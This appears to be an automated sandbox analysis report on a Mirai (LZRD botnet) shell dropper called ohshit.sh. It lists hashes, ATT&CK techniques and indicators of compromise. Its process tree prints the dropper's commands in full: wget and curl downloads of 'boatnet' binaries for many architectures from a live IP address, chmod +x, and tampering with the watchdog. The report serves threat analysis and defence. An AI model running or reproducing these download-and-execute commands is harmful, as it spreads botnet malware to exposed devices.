mirai | ab63171a0b3118f9a223b6f0cf23303cdd2aafcbdff1e8024e9728a91f99ae8d

Analysis

max time kernel
148s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
11/03/2025, 08:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

37b42f54fe3c72cb1eb5543a6c17f546
SHA1

637b619c1d425218ed7ec1ae064fc85196423c45
SHA256

ab63171a0b3118f9a223b6f0cf23303cdd2aafcbdff1e8024e9728a91f99ae8d
SHA512

e201190305d13d12894dfe7c8cd9f0c5022ebbd3af2d573f64433f676c1b22131f1abecc9f85bce3b453de6661a10291595318d15f025465360fa52c78089f8a

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1643	chmod
1511	chmod
1531	chmod
1539	chmod
1547	chmod
1581	chmod
1651	chmod
1523	chmod
1619	chmod
1500	chmod
1611	chmod
1635	chmod
1563	chmod
1597	chmod
1627	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/WTF	1501	ohshit.sh
/tmp/WTF	1512	ohshit.sh
/tmp/WTF	1524	ohshit.sh
/tmp/WTF	1532	ohshit.sh
/tmp/WTF	1540	ohshit.sh
/tmp/WTF	1548	ohshit.sh
/tmp/WTF	1564	ohshit.sh
/tmp/WTF	1582	ohshit.sh
/tmp/WTF	1598	ohshit.sh
/tmp/WTF	1612	ohshit.sh
/tmp/WTF	1620	ohshit.sh
/tmp/WTF	1628	ohshit.sh
/tmp/WTF	1636	ohshit.sh
/tmp/WTF	1644	ohshit.sh
/tmp/WTF	1652	ohshit.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	ohshit.sh
File opened for modification	/dev/misc/watchdog	ohshit.sh

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	ohshit.sh
File opened for modification	/bin/watchdog	ohshit.sh

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-1.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1569/cmdline	ohshit.sh
File opened for reading	/proc/1065/cmdline	ohshit.sh
File opened for reading	/proc/1331/cmdline	ohshit.sh
File opened for reading	/proc/1476/cmdline	ohshit.sh
File opened for reading	/proc/1504/cmdline	ohshit.sh
File opened for reading	/proc/1647/cmdline	ohshit.sh
File opened for reading	/proc/524/cmdline	ohshit.sh
File opened for reading	/proc/962/cmdline	ohshit.sh
File opened for reading	/proc/1077/cmdline	ohshit.sh
File opened for reading	/proc/1341/cmdline	ohshit.sh
File opened for reading	/proc/1633/cmdline	ohshit.sh
File opened for reading	/proc/1653/cmdline	ohshit.sh
File opened for reading	/proc/1121/cmdline	ohshit.sh
File opened for reading	/proc/1125/cmdline	ohshit.sh
File opened for reading	/proc/457/cmdline	ohshit.sh
File opened for reading	/proc/462/cmdline	ohshit.sh
File opened for reading	/proc/518/cmdline	ohshit.sh
File opened for reading	/proc/532/cmdline	ohshit.sh
File opened for reading	/proc/1252/cmdline	ohshit.sh
File opened for reading	/proc/716/cmdline	ohshit.sh
File opened for reading	/proc/1067/cmdline	ohshit.sh
File opened for reading	/proc/1138/cmdline	ohshit.sh
File opened for reading	/proc/1613/cmdline	ohshit.sh
File opened for reading	/proc/433/cmdline	ohshit.sh
File opened for reading	/proc/867/cmdline	ohshit.sh
File opened for reading	/proc/1061/cmdline	ohshit.sh
File opened for reading	/proc/1370/cmdline	ohshit.sh
File opened for reading	/proc/1629/cmdline	ohshit.sh
File opened for reading	/proc/544/cmdline	ohshit.sh
File opened for reading	/proc/968/cmdline	ohshit.sh
File opened for reading	/proc/1593/cmdline	ohshit.sh
File opened for reading	/proc/1129/cmdline	ohshit.sh
File opened for reading	/proc/1165/cmdline	ohshit.sh
File opened for reading	/proc/632/cmdline	ohshit.sh
File opened for reading	/proc/934/cmdline	ohshit.sh
File opened for reading	/proc/1188/cmdline	ohshit.sh
File opened for reading	/proc/1286/cmdline	ohshit.sh
File opened for reading	/proc/1541/cmdline	ohshit.sh
File opened for reading	/proc/1549/cmdline	ohshit.sh
File opened for reading	/proc/1565/cmdline	ohshit.sh
File opened for reading	/proc/1641/cmdline	ohshit.sh
File opened for reading	/proc/1502/cmdline	ohshit.sh
File opened for reading	/proc/1134/cmdline	ohshit.sh
File opened for reading	/proc/917/cmdline	ohshit.sh
File opened for reading	/proc/1088/cmdline	ohshit.sh
File opened for reading	/proc/1148/cmdline	ohshit.sh
File opened for reading	/proc/1637/cmdline	ohshit.sh
File opened for reading	/proc/1285/cmdline	ohshit.sh
File opened for reading	/proc/1308/cmdline	ohshit.sh
File opened for reading	/proc/1533/cmdline	ohshit.sh
File opened for reading	/proc/1645/cmdline	ohshit.sh
File opened for reading	/proc/1481/cmdline	ohshit.sh
File opened for reading	/proc/1551/cmdline	ohshit.sh
File opened for reading	/proc/1583/cmdline	ohshit.sh
File opened for reading	/proc/1623/cmdline	ohshit.sh
File opened for reading	/proc/451/cmdline	ohshit.sh
File opened for reading	/proc/465/cmdline	ohshit.sh
File opened for reading	/proc/1151/cmdline	ohshit.sh
File opened for reading	/proc/1515/cmdline	ohshit.sh
File opened for reading	/proc/1632/cmdline	ohshit.sh
File opened for reading	/proc/670/cmdline	ohshit.sh
File opened for reading	/proc/1178/cmdline	ohshit.sh
File opened for reading	/proc/1266/cmdline	ohshit.sh
File opened for reading	/proc/1303/cmdline	ohshit.sh

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1505	wget
1506	curl

Writes file to tmp directory 27 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/boatnet.x86	curl
File opened for modification	/tmp/boatnet.mips	wget
File opened for modification	/tmp/boatnet.x86_64	curl
File opened for modification	/tmp/boatnet.mpsl	wget
File opened for modification	/tmp/boatnet.arm	wget
File opened for modification	/tmp/boatnet.arm6	curl
File opened for modification	/tmp/boatnet.arm7	curl
File opened for modification	/tmp/boatnet.ppc	curl
File opened for modification	/tmp/boatnet.mpsl	curl
File opened for modification	/tmp/boatnet.arm7	wget
File opened for modification	/tmp/boatnet.spc	curl
File opened for modification	/tmp/boatnet.m68k	curl
File opened for modification	/tmp/boatnet.sh4	wget
File opened for modification	/tmp/boatnet.sh4	curl
File opened for modification	/tmp/WTF	ohshit.sh
File opened for modification	/tmp/boatnet.arc	curl
File opened for modification	/tmp/boatnet.i468	curl
File opened for modification	/tmp/boatnet.arm	curl
File opened for modification	/tmp/boatnet.arm5	wget
File opened for modification	/tmp/boatnet.arm5	curl
File opened for modification	/tmp/boatnet.ppc	wget
File opened for modification	/tmp/boatnet.spc	wget
File opened for modification	/tmp/boatnet.x86	wget
File opened for modification	/tmp/boatnet.mips	curl
File opened for modification	/tmp/boatnet.i686	curl
File opened for modification	/tmp/boatnet.arm6	wget
File opened for modification	/tmp/boatnet.m68k	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
- Writes file to tmp directory
PID:1481
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.x86
  2⤵
  - Writes file to tmp directory
  PID:1482
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.x86
  2⤵
  - Writes file to tmp directory
  PID:1498
- /bin/cat
  cat boatnet.x86
  2⤵
  PID:1499
- /bin/chmod
  chmod +x boatnet.x86 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1500
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1505
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1506
- /bin/chmod
  chmod +x boatnet.mips boatnet.x86 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.arc
  2⤵
  PID:1516
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.arc
  2⤵
  - Writes file to tmp directory
  PID:1521
- /bin/chmod
  chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1523
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.i468
  2⤵
  PID:1528
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.i468
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1531
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.i686
  2⤵
  PID:1536
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.i686
  2⤵
  - Writes file to tmp directory
  PID:1537
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1539
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.x86_64
  2⤵
  PID:1544
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1545
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1547
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1552
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1553
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1563
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.arm
  2⤵
  - Writes file to tmp directory
  PID:1568
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.arm
  2⤵
  - Writes file to tmp directory
  PID:1573
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-qvqGjl systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1581
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.arm5
  2⤵
  - Writes file to tmp directory
  PID:1586
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.arm5
  2⤵
  - Writes file to tmp directory
  PID:1593
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1597
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.arm6
  2⤵
  - Writes file to tmp directory
  PID:1602
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.arm6
  2⤵
  - Writes file to tmp directory
  PID:1607
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1611
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.arm7
  2⤵
  - Writes file to tmp directory
  PID:1616
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.arm7
  2⤵
  - Writes file to tmp directory
  PID:1617
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1619
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.ppc
  2⤵
  - Writes file to tmp directory
  PID:1624
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.ppc
  2⤵
  - Writes file to tmp directory
  PID:1625
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1627
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.spc
  2⤵
  - Writes file to tmp directory
  PID:1632
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.spc
  2⤵
  - Writes file to tmp directory
  PID:1633
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1635
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.m68k
  2⤵
  - Writes file to tmp directory
  PID:1640
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.m68k
  2⤵
  - Writes file to tmp directory
  PID:1641
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1643
- /usr/bin/wget
  wget http://107.172.82.193/hiddenbin/boatnet.sh4
  2⤵
  - Writes file to tmp directory
  PID:1648
- /usr/bin/curl
  curl -O http://107.172.82.193/hiddenbin/boatnet.sh4
  2⤵
  - Writes file to tmp directory
  PID:1649
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Zq653C netplan_vm7zfz3d ohshit.sh snap-private-tmp ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-SWnNwF WTF
  2⤵
  - File and Directory Permissions Modification
  PID:1651

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/boatnet.x86

Filesize
20KB

MD5
681dd964889eddd4cfdc230ba745767b

SHA1
bdb24c1844bc8285e2bf781613149f6db7b4928d

SHA256
fca185b5efc7e5df44003d8612f179414eadb71c31386c707a7e6f1f8809790e

SHA512
ac2556dd6bf5c1fde0c0eea5c78037274065cbb5231969d572c8df8dafe3740c49d2c681d21e3abc0f786f1c617162af4c955543f28fe1462dbd196565c655a4

Download Submit